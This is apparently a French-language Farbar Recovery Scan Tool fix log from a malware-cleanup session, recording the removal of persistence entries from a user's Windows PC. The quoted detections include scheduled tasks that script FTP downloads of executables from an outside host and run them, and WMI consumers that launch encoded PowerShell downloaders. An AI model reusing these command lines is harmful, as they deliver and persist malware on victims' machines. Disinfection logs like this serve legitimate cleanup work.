Format du document : text/plain
Prévisualisation
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 6.02.2019
Exécuté par seb (08-02-2019 11:15:29) Run:2
Exécuté depuis C:\Users\seb\Desktop
Profils chargés: seb (Profils disponibles: seb)
Mode d'amorçage: Safe Mode (with Networking)
==============================================
fixlist contenu:
*****************
CloseProcesses:
CreateRestorePoint:
HKLM-x32\...\Run: [start] => C:\Windows\SysWOW64\scrobj.dll [173568 2009-07-14] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup1] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP001.TMP\" <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup0] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP002.TMP\" <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup2] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP003.TMP\" <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup3] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP004.TMP\" <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup4] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Windows\TEMP\IXP000.TMP\" <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup5] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP005.TMP\" <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup6] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP006.TMP\" <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy: Restriction - Chrome <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{f389f567-6176-4f2f-ac37-b46e329c11fc} <==== ATTENTION (Restriction - IP)
ProxyServer: [S-1-5-21-538220665-914173731-789976379-1000] => 127.0.0.1:9666
SearchScopes: HKU\S-1-5-21-538220665-914173731-789976379-1000 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL =
BHO-x32: Pas de nom -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> Pas de fichier
BHO-x32: Pas de nom -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> Pas de fichier
Toolbar: HKLM - Pas de nom - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - Pas de fichier
Toolbar: HKU\S-1-5-21-538220665-914173731-789976379-1000 -> Pas de nom - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Pas de fichier
FF HKLM-x32\...\Firefox\Extensions: [FFPDFArchitectConverter@pdfarchitect.com] - C:\Program Files (x86)\PDF Architect\FFPDFArchitectExt => non trouvé(e)
FF HKLM-x32\...\Firefox\Extensions: [WSVCU@Wondershare.com] - C:\ProgramData\Wondershare\Video Converter Ultimate\WSVCU@Wondershare.com => non trouvé(e)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\firefox.cfg [2013-12-30] <==== ATTENTION
S2 moohelp; C:\Program Files (x86)\The Cleaner\mhelper.exe [X]
HKU\S-1-5-21-538220665-914173731-789976379-1000\...\ChromeHTML: -> <==== ATTENTION
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ContextMenuHandlers1: [AimersoftVideoConverterFileOpreation] -> {1AACB93E-AA97-47F1-BD02-8D2AF2815436} => -> Pas de fichier
ContextMenuHandlers1-x32: [WondershareVideoConverterFileOpreation] -> {FEB746CA-95C2-485F-B386-C30D4E56D22E} => C:\Windows\SysWOW64\WSCM64.dll -> Pas de fichier
Task: {6447C7DD-5646-495E-A558-59FF5F5631FC} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {76247990-5A8F-4AE9-845D-3CC3573BA3FF} - \{2AC8BACC-1B7C-4A52-A929-0E4C58350019} -> Pas de fichier <==== ATTENTION
Task: {80E1B2CE-3A22-462A-AF2D-C4E58616A89C} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {D918B4B5-DD41-4836-A3D8-C2D81540F797} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {FD6E9B36-325E-48F3-A0A9-F9CEC2729588} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (l'élément de données a 670 caractères en plus).] <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:0B4227B4 [146]
AlternateDataStreams: C:\ProgramData\Temp:5C321E34 [125]
AlternateDataStreams: C:\ProgramData\Temp:CB0AACC9 [150]
AlternateDataStreams: C:\ProgramData\Temp:D5FBE8F9 [256]
StartRegedit:
Windows Registry Editor Version 5.00
[-HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains]
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains]
@=""
[-HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains]
[-HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\P3P]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains]
@=""
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\P3P]
EndRegedit:
EmptyTemp:
Hosts:
RemoveProxy:
*****************
Processus fermé avec succès.
Erreur: Un point de restauration ne peut être créé qu'en mode normal.
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\start" => non trouvé(e)
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup1" => non trouvé(e)
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup0" => non trouvé(e)
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup2" => non trouvé(e)
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup3" => non trouvé(e)
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup4" => non trouvé(e)
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup5" => non trouvé(e)
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup6" => non trouvé(e)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => non trouvé(e)
"C:\Windows\system32\GroupPolicy\Machine" => non trouvé(e)
"HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\\ActivePolicy" => non trouvé(e)
"HKU\S-1-5-21-538220665-914173731-789976379-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer" => non trouvé(e)
HKU\S-1-5-21-538220665-914173731-789976379-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{d944bb61-2e34-4dbf-a683-47e505c587dc} => non trouvé(e)
HKLM\Software\Classes\CLSID\{d944bb61-2e34-4dbf-a683-47e505c587dc} => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => non trouvé(e)
HKLM\Software\Wow6432Node\Classes\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9} => non trouvé(e)
HKLM\Software\Wow6432Node\Classes\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9} => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F}" => non trouvé(e)
HKLM\Software\Classes\CLSID\{CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} => non trouvé(e)
"HKU\S-1-5-21-538220665-914173731-789976379-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => non trouvé(e)
HKLM\Software\Classes\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => non trouvé(e)
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\FFPDFArchitectConverter@pdfarchitect.com" => non trouvé(e)
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\WSVCU@Wondershare.com" => non trouvé(e)
"C:\Program Files (x86)\mozilla firefox\firefox.cfg" => non trouvé(e)
moohelp => service non trouvé(e).
HKU\S-1-5-21-538220665-914173731-789976379-1000_Classes\ChromeHTML => non trouvé(e)
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => non trouvé(e)
HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => non trouvé(e)
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast => non trouvé(e)
HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\AimersoftVideoConverterFileOpreation => non trouvé(e)
HKLM\Software\Classes\CLSID\{1AACB93E-AA97-47F1-BD02-8D2AF2815436} => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WondershareVideoConverterFileOpreation => non trouvé(e)
HKLM\Software\Wow6432Node\Classes\CLSID\{FEB746CA-95C2-485F-B386-C30D4E56D22E} => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6447C7DD-5646-495E-A558-59FF5F5631FC}" => non trouvé(e)
"C:\Windows\System32\Tasks\Mysa3" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa3" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{76247990-5A8F-4AE9-845D-3CC3573BA3FF}" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{2AC8BACC-1B7C-4A52-A929-0E4C58350019}" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{80E1B2CE-3A22-462A-AF2D-C4E58616A89C}" => non trouvé(e)
"C:\Windows\System32\Tasks\Mysa1" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa1" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D918B4B5-DD41-4836-A3D8-C2D81540F797}" => non trouvé(e)
"C:\Windows\System32\Tasks\Mysa2" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa2" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FD6E9B36-325E-48F3-A0A9-F9CEC2729588}" => non trouvé(e)
"C:\Windows\System32\Tasks\Mysa" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa" => non trouvé(e)
"CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\"" => non trouvé(e)
"fuckyoumm2_itimer" => non trouvé(e)
"fuckyoumm2_itimer" => non trouvé(e)
"fuckyoumm3" => non trouvé(e)
"fuckyoumm4" => non trouvé(e)
"C:\ProgramData\Temp" => ":0B4227B4" ADS non trouvé(e).
"C:\ProgramData\Temp" => ":5C321E34" ADS non trouvé(e).
"C:\ProgramData\Temp" => ":CB0AACC9" ADS non trouvé(e).
"C:\ProgramData\Temp" => ":D5FBE8F9" ADS non trouvé(e).
====> Registre
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
========= RemoveProxy: =========
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-538220665-914173731-789976379-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-538220665-914173731-789976379-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 261645 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 0 B
Edge => 0 B
Chrome => 0 B
Firefox => 407315176 B
Opera => 152276 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 200907968 B
systemprofile32 => 20256110 B
LocalService => 26662548 B
NetworkService => 66228 B
seb => 1795058831 B
RecycleBin => 0 B
EmptyTemp: => 2.3 GB données temporaires supprimées.
================================
Le système a dû redémarrer.
==== Fin de Fixlog 11:27:10 ====